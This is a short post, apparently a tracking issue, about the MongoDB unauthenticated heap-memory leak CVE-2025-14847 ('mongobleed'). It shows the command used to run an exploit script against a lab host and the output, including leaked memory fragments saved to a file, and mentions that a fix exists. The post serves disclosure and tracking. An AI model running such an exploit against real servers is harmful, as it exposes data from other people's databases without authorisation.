CVE-2025-14847 (aka mongobleed) MongoDB Unauthenticated heap-memory leak #20812
Description
A working exploit looks like this:
$ python3 mongobleed.py --host mongodb.lab
[*] mongobleed - CVE-2025-14847 MongoDB Memory Leak
[*] Author: Joe Desimone - x.com/dez_
[*] Target: localhost:27017
[*] Scanning offsets 20-50000
[+] offset= 117 len= 39: ssions^\u0001�r��*YDr���
[+] offset=16582 len=1552: MemAvailable: 8554792 kB\nBuffers: ...
[+] offset=18731 len=3908: Recv SyncookiesFailed EmbryonicRsts ...
[*] Total leaked: 8748 bytes
[*] Unique fragments: 42
[*] Saved to: leaked.bin
$
The fix is available, and ox security has a nice analysis of the issue
MongoDB is a popular software for people who don't know SQL to handle large amount of unstructured data, being able to leak parts of its heap without authentication will likely yield some interesting stuff.